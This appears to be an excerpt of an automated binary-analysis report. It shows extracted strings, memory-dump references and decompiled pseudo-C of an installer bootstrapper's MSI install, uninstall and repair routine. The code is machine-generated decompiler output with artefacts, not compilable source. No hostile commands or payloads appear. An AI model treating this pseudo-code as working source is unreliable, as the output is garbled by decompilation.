                                                                                                                                                                  • Failed to copy install arguments for related bundle package, xrefs: 00422C1D
                                                                                                                                                                  • Failed to allocate memory for dependency providers., xrefs: 00422D4F
                                                                                                                                                                  • Failed to copy version for pseudo bundle., xrefs: 00422D9E
                                                                                                                                                                  • Failed to allocate space for burn payload inside of related bundle struct, xrefs: 00422A5A
                                                                                                                                                                  • Failed to append relation type to uninstall arguments for related bundle package, xrefs: 00422CDA
                                                                                                                                                                  • Failed to copy local source path for pseudo bundle., xrefs: 00422AD7
                                                                                                                                                                  • Failed to allocate memory for pseudo bundle payload hash., xrefs: 00422B49
                                                                                                                                                                  • Failed to copy uninstall arguments for related bundle package, xrefs: 00422CB9
                                                                                                                                                                  • Failed to append relation type to repair arguments for related bundle package, xrefs: 00422C87
                                                                                                                                                                  • Failed to append relation type to install arguments for related bundle package, xrefs: 00422C3E
                                                                                                                                                                  • Failed to copy repair arguments for related bundle package, xrefs: 00422C66
                                                                                                                                                                  • Failed to copy cache id for pseudo bundle., xrefs: 00422BFB
                                                                                                                                                                  • Failed to allocate space for burn package payload inside of related bundle struct, xrefs: 00422A21
                                                                                                                                                                  • Failed to copy download source for pseudo bundle., xrefs: 00422B05
                                                                                                                                                                  • Failed to copy key for pseudo bundle payload., xrefs: 00422A8F
                                                                                                                                                                  • Failed to copy filename for pseudo bundle., xrefs: 00422AB3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 65%
                                                                                                                                                                  			E0041B2FA(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				char _v1584;
                                                                                                                                                                  				signed int _v1588;
                                                                                                                                                                  				char _v1592;
                                                                                                                                                                  				signed int _v1596;
                                                                                                                                                                  				char _v1600;
                                                                                                                                                                  				char _v1604;
                                                                                                                                                                  				char _v1608;
                                                                                                                                                                  				intOrPtr* _v1612;
                                                                                                                                                                  				intOrPtr _v1616;
                                                                                                                                                                  				intOrPtr _v1620;
                                                                                                                                                                  				intOrPtr _v1624;
                                                                                                                                                                  				intOrPtr _v1628;
                                                                                                                                                                  				intOrPtr _v1632;
                                                                                                                                                                  				intOrPtr _v1636;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				signed int _t136;
                                                                                                                                                                  				signed int _t153;
                                                                                                                                                                  				signed int _t155;
                                                                                                                                                                  				signed int _t156;
                                                                                                                                                                  				signed int _t158;
                                                                                                                                                                  				signed int _t160;
                                                                                                                                                                  				signed int _t162;
                                                                                                                                                                  				signed int _t164;
                                                                                                                                                                  				signed int _t166;
                                                                                                                                                                  				signed int _t168;
                                                                                                                                                                  				signed int _t176;
                                                                                                                                                                  				signed int _t178;
                                                                                                                                                                  				void* _t187;
                                                                                                                                                                  				void* _t191;
                                                                                                                                                                  				signed int _t203;
                                                                                                                                                                  				signed int _t209;
                                                                                                                                                                  				signed int _t212;
                                                                                                                                                                  				signed int _t216;
                                                                                                                                                                  				intOrPtr _t222;
                                                                                                                                                                  				signed int _t223;
                                                                                                                                                                  				signed int _t224;
                                                                                                                                                                  				intOrPtr _t225;
                                                                                                                                                                  				void* _t238;
                                                                                                                                                                  				signed int _t240;
                                                                                                                                                                  				void* _t246;
                                                                                                                                                                  				intOrPtr _t249;
                                                                                                                                                                  				intOrPtr _t251;
                                                                                                                                                                  				void* _t256;
                                                                                                                                                                  				char* _t263;
                                                                                                                                                                  				intOrPtr _t268;
                                                                                                                                                                  				void* _t271;
                                                                                                                                                                  				intOrPtr _t273;
                                                                                                                                                                  				signed int _t275;
                                                                                                                                                                  				signed int _t285;
                                                                                                                                                                  				signed int _t288;
                                                                                                                                                                  
                                                                                                                                                                  				_t136 =  *0x4560d0; // 0xae480e18
                                                                                                                                                                  				_v8 = _t136 ^ _t288;
                                                                                                                                                                  				_v1636 = _a4;
                                                                                                                                                                  				_v1616 = _a12;
                                                                                                                                                                  				_t249 = _a16;
                                                                                                                                                                  				_v1620 = _a20;
                                                                                                                                                                  				_t273 = _a8;
                                                                                                                                                                  				_v1632 = _a24;
                                                                                                                                                                  				_push(0x628);
                                                                                                                                                                  				_v1612 = _a28;
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				_push( &_v1584);
                                                                                                                                                                  				_v1628 = _t249;
                                                                                                                                                                  				E004267C0(_t249, __ecx, _t273, 0, __eflags);
                                                                                                                                                                  				_v1600 = 0;
                                                                                                                                                                  				_v1604 = 0;
                                                                                                                                                                  				_v1608 = 0;
                                                                                                                                                                  				_v1592 = 0;
                                                                                                                                                                  				_v1588 = 0;
                                                                                                                                                                  				_v1596 = 0;
                                                                                                                                                                  				_t271 = 4;
                                                                                                                                                                  				if(_t249 == 0) {
					L23:
					__eflags =  *(_t273 + 0x10) & 0x00000004;
					_t146 =  !=  ? 0x3fdf : 0x1fdf;
					_v1624 =  !=  ? 0x3fdf : 0x1fdf;
					_t275 = E00413BE9( &_v1608, _t273,  *((intOrPtr*)( *((intOrPtr*)(_t273 + 8)) + 0x14)),  *((intOrPtr*)( *((intOrPtr*)(_t273 + 8)) + 0x24)),  &_v1608);
					__eflags = _t275;
					if(_t275 >= 0) {
						_t153 = E004314A9(_v1608,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t273 + 8)) + 0x7c)))) + 0x18)),  &_v1592);
						__eflags = _t153;
						if(_t153 >= 0) {
							_t155 = E00435549( &_v1608, _t271, _v1620,  *((intOrPtr*)(_t273 + 0x14)), _v1636, _v1632, _t249,  &_v1584);
							__eflags = _t155;
							if(_t155 >= 0) {
								_t156 =  *(_t273 + 0xc);
								_t256 = 0;
								__eflags = _t156;
								if(_t156 == 0) {
									L35:
									_t158 = E0041AC12(_t273,  *((intOrPtr*)( *((intOrPtr*)(_t273 + 8)) + 0xac)),  *((intOrPtr*)( *((intOrPtr*)(_t273 + 8)) + 0xb0)), _v1616, _t249,  &_v1588, _t256);
									__eflags = _t158;
									if(_t158 >= 0) {
										_t258 =  &_v1596;
										_t160 = E0041AC12(_t273,  *((intOrPtr*)( *((intOrPtr*)(_t273 + 8)) + 0xac)),  *((intOrPtr*)( *((intOrPtr*)(_t273 + 8)) + 0xb0)), _v1616, _t249,  &_v1596, 1);
										__eflags = _t160;
										if(_t160 >= 0) {
											_t162 = E0041A2CD(_t273,  *((intOrPtr*)(_t273 + 8)),  *((intOrPtr*)(_t273 + 0x1c)),  &_v1588);
											__eflags = _t162;
											if(_t162 >= 0) {
												_t164 = E0041A2CD(_t273,  *((intOrPtr*)(_t273 + 8)),  *((intOrPtr*)(_t273 + 0x1c)),  &_v1596);
												__eflags = _t164;
												if(_t164 >= 0) {
													_t166 = E0041A624(_t249,  *((intOrPtr*)(_t273 + 8)),  *((intOrPtr*)(_t273 + 0x20)),  &_v1588);
													__eflags = _t166;
													if(_t166 >= 0) {
														_t168 = E0041A624(_t249,  *((intOrPtr*)(_t273 + 8)),  *((intOrPtr*)(_t273 + 0x20)),  &_v1596);
														__eflags = _t168;
														if(_t168 >= 0) {
															__eflags = _v1596;
															_t170 =  !=  ? _v1596 : 0x43b580;
															_push( !=  ? _v1596 : 0x43b580);
															_push(_v1592);
															_push(E0040E2BB( *((intOrPtr*)(_t273 + 0x18))));
															_push( *((intOrPtr*)( *((intOrPtr*)(_t273 + 8)))));
															E00402003(2, 0x2000012d, E0040E8FD(_v1628));
															_t176 =  *((intOrPtr*)(_t273 + 0x18)) - 1;
															__eflags = _t176;
															if(_t176 == 0) {
																_t251 = 0;
																_t178 = E00433C35( &_v1596,  &_v1588, L" REBOOT=ReallySuppress", 0);
																__eflags = _t178;
																if(_t178 >= 0) {
																	_push(L"IGNOREDEPENDENCIES");
																	_t285 = E00433CEA( &_v1588, L"%ls %ls=ALL", _v1588);
																	__eflags = _t285;
																	if(__eflags >= 0) {
																		_t285 = E00434F98(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t273 + 8)) + 0x90)), 0, 2, _v1588,  &_v1600);
																		__eflags = _t285 - 0x80070645;
																		if(_t285 == 0x80070645) {
																			E00402003(2, 0xa0000133,  *((intOrPtr*)( *((intOrPtr*)(_t273 + 8)))));
																			_t285 = 0;
																		}
																		__eflags = _t285;
																		if(_t285 >= 0) {
																			L6:
																			E00435855( &_v1584);
																			if(_v1588 != 0) {
																				E004380AB(_v1588);
																			}
																			if(_v1596 != 0) {
																				E004380AB(_v1596);
																			}
																			if(_v1592 != 0) {
																				E004380AB(_v1592);
																			}
																			if(_v1608 != 0) {
																				E004380AB(_v1608);
																			}
																			if(_v1604 != 0) {
																				E004380AB(_v1604);
																			}
																			_t187 = _v1600 - _t251;
																			if(_t187 == 0) {
																				 *_v1612 = _t251;
																			} else {
																				_t191 = _t187 - 1;
																				if(_t191 == 0) {
																					 *_v1612 = 1;
																				} else {
																					if(_t191 == 1) {
																						 *_v1612 = 2;
																					}
																				}
																			}
																			return L004267AF(_t285, _v8 ^ _t288, _t273, _t285);
																		} else {
																			_push("Failed to uninstall MSI package.");
																			L83:
																			_push(_t285);
																			E00430A57();
																			goto L6;
																		}
																	}
																	_push("Failed to add the list of dependencies to ignore to the properties.");
																	goto L83;
																}
																_push("Failed to add reboot suppression property on uninstall.");
																goto L83;
															}
															_t203 = _t176 - 1;
															__eflags = _t203;
															if(_t203 == 0) {
																_t251 = 0;
																__eflags = 0;
																L74:
																_t285 = E00433C35(_t258,  &_v1588, L" REBOOT=ReallySuppress", _t251);
																__eflags = _t285;
																if(__eflags >= 0) {
																	_t285 = E00435621(__eflags, _v1592, _v1588,  &_v1600);
																	__eflags = _t285;
																	if(_t285 >= 0) {
																		L78:
																		E0041AB5D(_t251, _t258, _t273, _t285,  *((intOrPtr*)(_t273 + 8)), _v1592);
																		goto L6;
																	}
																	_push("Failed to install MSI package.");
																	goto L83;
																}
																_push("Failed to add reboot suppression property on install.");
																goto L83;
															}
															_t209 = _t203 - 1;
															__eflags = _t209;
															if(_t209 == 0) {
																_t251 = 0;
																_t285 = E00433C35( &_v1596,  &_v1588, L" ACTION=ADMIN", 0);
																__eflags = _t285;
																if(_t285 >= 0) {
																	goto L74;
																}
																_push("Failed to add ADMIN property on admin install.");
																goto L83;
															}
															_t212 = _t209 - 1;
															__eflags = _t212;
															if(_t212 == 0) {
																L62:
																__eflags =  *((intOrPtr*)(_t273 + 0x18)) - 4;
																if( *((intOrPtr*)(_t273 + 0x18)) == 4) {
																	L64:
																	_t263 = 0x43b580;
																	L65:
																	__eflags =  *((intOrPtr*)(_t273 + 0x18)) - 4;
																	_t214 =  !=  ? "e" : "o";
																	__eflags = _v1588;
																	_push( !=  ? "e" : "o");
																	_t252 =  !=  ? _v1588 : 0x43b580;
																	_push(_t263);
																	_t216 = E00433CEA( &_v1588, L"%ls%ls REINSTALLMODE=\"cmus%ls\" REBOOT=ReallySuppress",  !=  ? _v1588 : 0x43b580);
																	__eflags = _t216;
																	if(_t216 >= 0) {
																		_push(L"IGNOREDEPENDENCIES");
																		__eflags = E00433CEA( &_v1588, L"%ls %ls=ALL", _v1588);
																		if(__eflags >= 0) {
																			_t285 = E00435621(__eflags, _v1592, _v1588,  &_v1600);
																			__eflags = _t285;
																			if(_t285 >= 0) {
																				L5:
																				_t251 = 0;
																				goto L6;
																			}
																			_push("Failed to run maintanance mode for MSI package.");
																			L27:
																			_push(_t285);
																			E00430A57();
																			goto L5;
																		}
																		_push("Failed to add the list of dependencies to ignore to the properties.");
                                                                                                                                                                  																		goto L27;
                                                                                                                                                                  																	}
                                                                                                                                                                  																	_push("Failed to add reinstall mode and reboot suppression properties on repair.");
                                                                                                                                                                  																	goto L27;
                                                                                                                                                                  																}
                                                                                                                                                                  																_t222 =  *((intOrPtr*)(_t273 + 8));
                                                                                                                                                                  																__eflags =  *(_t222 + 0xb8);
                                                                                                                                                                  																_t263 = L" REINSTALL=ALL";
                                                                                                                                                                  																if( *(_t222 + 0xb8) == 0) {
                                                                                                                                                                  																	goto L65;
                                                                                                                                                                  																}
                                                                                                                                                                  																goto L64;
                                                                                                                                                                  															}
                                                                                                                                                                  															_t223 = _t212 - 1;
                                                                                                                                                                  															__eflags = _t223;
                                                                                                                                                                  															if(_t223 == 0) {
                                                                                                                                                                  																goto L62;
                                                                                                                                                                  															}
                                                                                                                                                                  															_t251 = 0;
                                                                                                                                                                  															_t224 = _t223 - 1;
                                                                                                                                                                  															__eflags = _t224;
                                                                                                                                                                  															if(_t224 == 0) {
                                                                                                                                                                  																_t225 =  *((intOrPtr*)(_t273 + 8));
                                                                                                                                                                  																__eflags =  *(_t225 + 0xb8);
                                                                                                                                                                  																if( *(_t225 + 0xb8) != 0) {
                                                                                                                                                                  																	L58:
                                                                                                                                                                  																	_t285 = E00433C35(_t258,  &_v1588, L" REINSTALLMODE=\"vomus\" REBOOT=ReallySuppress", _t251);
                                                                                                                                                                  																	__eflags = _t285;
                                                                                                                                                                  																	if(__eflags >= 0) {
                                                                                                                                                                  																		_t285 = E00435621(__eflags, _v1592, _v1588,  &_v1600);
                                                                                                                                                                  																		__eflags = _t285;
                                                                                                                                                                  																		if(_t285 >= 0) {
                                                                                                                                                                  																			goto L78;
                                                                                                                                                                  																		}
                                                                                                                                                                  																		_push("Failed to perform minor upgrade of MSI package.");
                                                                                                                                                                  																		goto L83;
                                                                                                                                                                  																	}
                                                                                                                                                                  																	_push("Failed to add reinstall mode and reboot suppression properties on minor upgrade.");
                                                                                                                                                                  																	goto L83;
                                                                                                                                                                  																}
                                                                                                                                                                  																_t285 = E00433C35( &_v1596,  &_v1588, L" REINSTALL=ALL", 0);
                                                                                                                                                                  																__eflags = _t285;
                                                                                                                                                                  																if(_t285 >= 0) {
                                                                                                                                                                  																	goto L58;
                                                                                                                                                                  																}
                                                                                                                                                                  																_push("Failed to add reinstall all property on minor upgrade.");
                                                                                                                                                                  																goto L83;
                                                                                                                                                                  															}
                                                                                                                                                                  															__eflags = _t224 == 1;
                                                                                                                                                                  															if(_t224 == 1) {
                                                                                                                                                                  																goto L74;
                                                                                                                                                                  															}
                                                                                                                                                                  															goto L6;
                                                                                                                                                                  														}
                                                                                                                                                                  														_push("Failed to add patch properties to obfuscated argument string.");
                                                                                                                                                                  														goto L27;
                                                                                                                                                                  													}
                                                                                                                                                                  													_push("Failed to add patch properties to argument string.");
                                                                                                                                                                  													goto L27;
                                                                                                                                                                  												}
                                                                                                                                                                  												_push("Failed to add feature action properties to obfuscated argument string.");
                                                                                                                                                                  												goto L27;
                                                                                                                                                                  											}
                                                                                                                                                                  											_push("Failed to add feature action properties to argument string.");
                                                                                                                                                                  											goto L27;
                                                                                                                                                                  										}
                                                                                                                                                                  										_push("Failed to add obfuscated properties to argument string.");
                                                                                                                                                                  										goto L27;
                                                                                                                                                                  									}
                                                                                                                                                                  									_push("Failed to add properties to argument string.");
                                                                                                                                                                  									goto L27;
                                                                                                                                                                  								}
                                                                                                                                                                  								__eflags =  *_t156;
                                                                                                                                                                  								if( *_t156 == 0) {
                                                                                                                                                                  									goto L35;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t285 = E00435046(_v1624, _t156, 0);
                                                                                                                                                                  								__eflags = _t285;
                                                                                                                                                                  								if(_t285 >= 0) {
                                                                                                                                                                  									_t256 = 0;
                                                                                                                                                                  									__eflags = 0;
                                                                                                                                                                  									goto L35;
                                                                                                                                                                  								}
                                                                                                                                                                  								_push( *(_t273 + 0xc));
                                                                                                                                                                  								E00430A57(_t285, "Failed to enable logging for package: %ls to: %ls",  *((intOrPtr*)( *((intOrPtr*)(_t273 + 8)))));
                                                                                                                                                                  								goto L5;
                                                                                                                                                                  							}
                                                                                                                                                                  							_push("Failed to initialize external UI handler.");
                                                                                                                                                                  							goto L27;
                                                                                                                                                                  						}
                                                                                                                                                                  						_push("Failed to build MSI path.");
                                                                                                                                                                  						goto L27;
                                                                                                                                                                  					}
                                                                                                                                                                  					E00430A57(_t275, "Failed to get cached path for package: %ls",  *((intOrPtr*)( *((intOrPtr*)(_t273 + 8)))));
                                                                                                                                                                  					goto L5;
                                                                                                                                                                  				}
                                                                                                                                                                  				if( *((intOrPtr*)(_t273 + 0x18)) != 1) {
                                                                                                                                                                  					__eflags =  *((intOrPtr*)(_t273 + 0x18)) - 2;
                                                                                                                                                                  					if( *((intOrPtr*)(_t273 + 0x18)) != 2) {
                                                                                                                                                                  						goto L23;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t268 =  *((intOrPtr*)(_t273 + 8));
                                                                                                                                                                  					__eflags =  *(_t268 + 0x14);
                                                                                                                                                                  					_push( &_v1604);
                                                                                                                                                                  					_push(L"VersionString");
                                                                                                                                                                  					_t238 = 2;
                                                                                                                                                                  					_t239 =  !=  ? _t271 : _t238;
                                                                                                                                                                  					_push( !=  ? _t271 : _t238);
                                                                                                                                                                  					_push(0);
                                                                                                                                                                  					_push( *((intOrPtr*)(_t268 + 0x90)));
                                                                                                                                                                  					_t240 = E00435361(_t268);
                                                                                                                                                                  					__eflags = _t240;
                                                                                                                                                                  					if(_t240 < 0) {
                                                                                                                                                                  						goto L23;
                                                                                                                                                                  					}
                                                                                                                                                                  					_push(4);
                                                                                                                                                                  					L4:
                                                                                                                                                                  					E0040E76E();
                                                                                                                                                                  					_push(E0040E2BB( *((intOrPtr*)(_t273 + 0x18))));
                                                                                                                                                                  					E00402003(2, 0x2000013e,  *((intOrPtr*)( *((intOrPtr*)(_t273 + 8)))));
                                                                                                                                                                  					goto L5;
                                                                                                                                                                  				}
                                                                                                                                                                  				_push( &_v1604);
                                                                                                                                                                  				_push(L"VersionString");
                                                                                                                                                                  				_t246 = 2;
                                                                                                                                                                  				_t247 =  !=  ? _t271 : _t246;
                                                                                                                                                                  				_push( !=  ? _t271 : _t246);
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				_push( *((intOrPtr*)( *((intOrPtr*)(_t273 + 8)) + 0x90)));
                                                                                                                                                                  				if(E00435361( *((intOrPtr*)(_t273 + 8))) >= 0) {
                                                                                                                                                                  					goto L23;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push(2);
                                                                                                                                                                  					goto L4;
                                                                                                                                                                  				}
                                                                                                                                                                  			}
                                                                                                                                                                  0x0041b55c
                                                                                                                                                                  0x0041b563
                                                                                                                                                                  0x0041b565
                                                                                                                                                                  0x0041b56e
                                                                                                                                                                  0x0041b571
                                                                                                                                                                  0x0041b573
                                                                                                                                                                  0x0041b575
                                                                                                                                                                  0x0041b5ac
                                                                                                                                                                  0x0041b5ca
                                                                                                                                                                  0x0041b5d1
                                                                                                                                                                  0x0041b5d3
                                                                                                                                                                  0x0041b5e4
                                                                                                                                                                  0x0041b5fe
                                                                                                                                                                  0x0041b605
                                                                                                                                                                  0x0041b607
                                                                                                                                                                  0x0041b620
                                                                                                                                                                  0x0041b627
                                                                                                                                                                  0x0041b629
                                                                                                                                                                  0x0041b642
                                                                                                                                                                  0x0041b649
                                                                                                                                                                  0x0041b64b
                                                                                                                                                                  0x0041b664
                                                                                                                                                                  0x0041b66b
                                                                                                                                                                  0x0041b66d
                                                                                                                                                                  0x0041b686
                                                                                                                                                                  0x0041b68d
                                                                                                                                                                  0x0041b68f
                                                                                                                                                                  0x0041b69b
                                                                                                                                                                  0x0041b6a9
                                                                                                                                                                  0x0041b6b0
                                                                                                                                                                  0x0041b6b1
                                                                                                                                                                  0x0041b6bf
                                                                                                                                                                  0x0041b6c3
                                                                                                                                                                  0x0041b6d8
                                                                                                                                                                  0x0041b6e3
                                                                                                                                                                  0x0041b6e3
                                                                                                                                                                  0x0041b6e4
                                                                                                                                                                  0x0041b8cd
                                                                                                                                                                  0x0041b8dc
                                                                                                                                                                  0x0041b8e3
                                                                                                                                                                  0x0041b8e5
                                                                                                                                                                  0x0041b8ee
                                                                                                                                                                  0x0041b90a
                                                                                                                                                                  0x0041b90f
                                                                                                                                                                  0x0041b911
                                                                                                                                                                  0x0041b943
                                                                                                                                                                  0x0041b945
                                                                                                                                                                  0x0041b94b
                                                                                                                                                                  0x0041b959
                                                                                                                                                                  0x0041b961
                                                                                                                                                                  0x0041b961
                                                                                                                                                                  0x0041b963
                                                                                                                                                                  0x0041b965
                                                                                                                                                                  0x0041b3ed
                                                                                                                                                                  0x0041b3f4
                                                                                                                                                                  0x0041b400
                                                                                                                                                                  0x0041b408
                                                                                                                                                                  0x0041b408
                                                                                                                                                                  0x0041b414
                                                                                                                                                                  0x0041b41c
                                                                                                                                                                  0x0041b41c
                                                                                                                                                                  0x0041b428
                                                                                                                                                                  0x0041b430
                                                                                                                                                                  0x0041b430
                                                                                                                                                                  0x0041b43c
                                                                                                                                                                  0x0041b444
                                                                                                                                                                  0x0041b444
                                                                                                                                                                  0x0041b450
                                                                                                                                                                  0x0041b458
                                                                                                                                                                  0x0041b458
                                                                                                                                                                  0x0041b463
                                                                                                                                                                  0x0041b465
                                                                                                                                                                  0x0041b986
                                                                                                                                                                  0x0041b46b
                                                                                                                                                                  0x0041b46b
                                                                                                                                                                  0x0041b46c
                                                                                                                                                                  0x0041b978
                                                                                                                                                                  0x0041b472
                                                                                                                                                                  0x0041b473
                                                                                                                                                                  0x0041b47f
                                                                                                                                                                  0x0041b47f
                                                                                                                                                                  0x0041b473
                                                                                                                                                                  0x0041b46c
                                                                                                                                                                  0x0041b998
                                                                                                                                                                  0x0041b96b
                                                                                                                                                                  0x0041b96b
                                                                                                                                                                  0x0041b918
                                                                                                                                                                  0x0041b918
                                                                                                                                                                  0x0041b919
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b91f
                                                                                                                                                                  0x0041b965
                                                                                                                                                                  0x0041b913
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b913
                                                                                                                                                                  0x0041b8e7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b8e7
                                                                                                                                                                  0x0041b6ea
                                                                                                                                                                  0x0041b6ea
                                                                                                                                                                  0x0041b6eb
                                                                                                                                                                  0x0041b871
                                                                                                                                                                  0x0041b871
                                                                                                                                                                  0x0041b873
                                                                                                                                                                  0x0041b885
                                                                                                                                                                  0x0041b887
                                                                                                                                                                  0x0041b889
                                                                                                                                                                  0x0041b8ad
                                                                                                                                                                  0x0041b8af
                                                                                                                                                                  0x0041b8b1
                                                                                                                                                                  0x0041b8ba
                                                                                                                                                                  0x0041b8c3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b8c3
                                                                                                                                                                  0x0041b8b3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b8b3
                                                                                                                                                                  0x0041b88b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b88b
                                                                                                                                                                  0x0041b6f1
                                                                                                                                                                  0x0041b6f1
                                                                                                                                                                  0x0041b6f2
                                                                                                                                                                  0x0041b84d
                                                                                                                                                                  0x0041b861
                                                                                                                                                                  0x0041b863
                                                                                                                                                                  0x0041b865
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b867
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b867
                                                                                                                                                                  0x0041b6f8
                                                                                                                                                                  0x0041b6f8
                                                                                                                                                                  0x0041b6f9
                                                                                                                                                                  0x0041b792
                                                                                                                                                                  0x0041b792
                                                                                                                                                                  0x0041b796
                                                                                                                                                                  0x0041b7aa
                                                                                                                                                                  0x0041b7aa
                                                                                                                                                                  0x0041b7ac
                                                                                                                                                                  0x0041b7ac
                                                                                                                                                                  0x0041b7ba
                                                                                                                                                                  0x0041b7bd
                                                                                                                                                                  0x0041b7c4
                                                                                                                                                                  0x0041b7c5
                                                                                                                                                                  0x0041b7cc
                                                                                                                                                                  0x0041b7da
                                                                                                                                                                  0x0041b7e4
                                                                                                                                                                  0x0041b7e6
                                                                                                                                                                  0x0041b7f2
                                                                                                                                                                  0x0041b813
                                                                                                                                                                  0x0041b815
                                                                                                                                                                  0x0041b839
                                                                                                                                                                  0x0041b83b
                                                                                                                                                                  0x0041b83d
                                                                                                                                                                  0x0041b3eb
                                                                                                                                                                  0x0041b3eb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b3eb
                                                                                                                                                                  0x0041b843
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to add reboot suppression property on install., xrefs: 0041B88B
                                                                                                                                                                  • Failed to get cached path for package: %ls, xrefs: 0041B4F7
                                                                                                                                                                  • Failed to perform minor upgrade of MSI package., xrefs: 0041B788
                                                                                                                                                                  • IGNOREDEPENDENCIES, xrefs: 0041B7F2, 0041B8EE
                                                                                                                                                                  • REINSTALL=ALL, xrefs: 0041B723, 0041B7A3
                                                                                                                                                                  • Failed to add the list of dependencies to ignore to the properties., xrefs: 0041B817, 0041B913
                                                                                                                                                                  • %ls %ls=ALL, xrefs: 0041B803, 0041B8FF
                                                                                                                                                                  • Failed to add reboot suppression property on uninstall., xrefs: 0041B8E7
                                                                                                                                                                  • Failed to run maintanance mode for MSI package., xrefs: 0041B843
                                                                                                                                                                  • Failed to build MSI path., xrefs: 0041B52D
                                                                                                                                                                  • Failed to initialize external UI handler., xrefs: 0041B567
                                                                                                                                                                  • ACTION=ADMIN, xrefs: 0041B850
                                                                                                                                                                  • Failed to add reinstall mode and reboot suppression properties on minor upgrade., xrefs: 0041B75C
                                                                                                                                                                  • Failed to install MSI package., xrefs: 0041B8B3
                                                                                                                                                                  • Failed to add feature action properties to argument string., xrefs: 0041B62B
                                                                                                                                                                  • Failed to add feature action properties to obfuscated argument string., xrefs: 0041B64D
                                                                                                                                                                  • %ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress, xrefs: 0041B7D4
                                                                                                                                                                  • Failed to add obfuscated properties to argument string., xrefs: 0041B609
                                                                                                                                                                  • Failed to add reinstall mode and reboot suppression properties on repair., xrefs: 0041B7E8
                                                                                                                                                                  • Failed to add reinstall all property on minor upgrade., xrefs: 0041B73A
                                                                                                                                                                  • REINSTALLMODE="vomus" REBOOT=ReallySuppress, xrefs: 0041B745
                                                                                                                                                                  • Failed to add patch properties to obfuscated argument string., xrefs: 0041B691
                                                                                                                                                                  • REBOOT=ReallySuppress, xrefs: 0041B874, 0041B8D0
                                                                                                                                                                  • Failed to add patch properties to argument string., xrefs: 0041B66F
                                                                                                                                                                  • Failed to enable logging for package: %ls to: %ls, xrefs: 0041B597
                                                                                                                                                                  • Failed to add ADMIN property on admin install., xrefs: 0041B867
                                                                                                                                                                  • Failed to uninstall MSI package., xrefs: 0041B96B
                                                                                                                                                                  • Failed to add properties to argument string., xrefs: 0041B5D5
                                                                                                                                                                  • VersionString, xrefs: 0041B3A6, 0041B49D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: ACTION=ADMIN$ REBOOT=ReallySuppress$ REINSTALL=ALL$ REINSTALLMODE="vomus" REBOOT=ReallySuppress$%ls %ls=ALL$%ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress$Failed to add ADMIN property on admin install.$Failed to add feature action properties to argument string.$Failed to add feature action properties to obfuscated argument string.$Failed to add obfuscated properties to argument string.$Failed to add patch properties to argument string.$Failed to add patch properties to obfuscated argument string.$Failed to add properties to argument string.$Failed to add reboot suppression property on install.$Failed to add reboot suppression property on uninstall.$Failed to add reinstall all property on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on repair.$Failed to add the list of dependencies to ignore to the properties.$Failed to build MSI path.$Failed to enable logging for package: %ls to: %ls$Failed to get cached path for package: %ls$Failed to initialize external UI handler.$Failed to install MSI package.$Failed to perform minor upgrade of MSI package.$Failed to run maintanance mode for MSI package.$Failed to uninstall MSI package.$IGNOREDEPENDENCIES$VersionString
                                                                                                                                                                  • API String ID: 0-2112609193
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                  			E10022710(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				signed int _v20;
                                                                                                                                                                  				struct _SYSTEMTIME _v36;
                                                                                                                                                                  				char _v303;
                                                                                                                                                                  				char _v304;
                                                                                                                                                                  				char _v332;
                                                                                                                                                                  				char _v360;
                                                                                                                                                                  				char _v388;
                                                                                                                                                                  				char _v416;
                                                                                                                                                                  				char _v444;
                                                                                                                                                                  				char _v472;
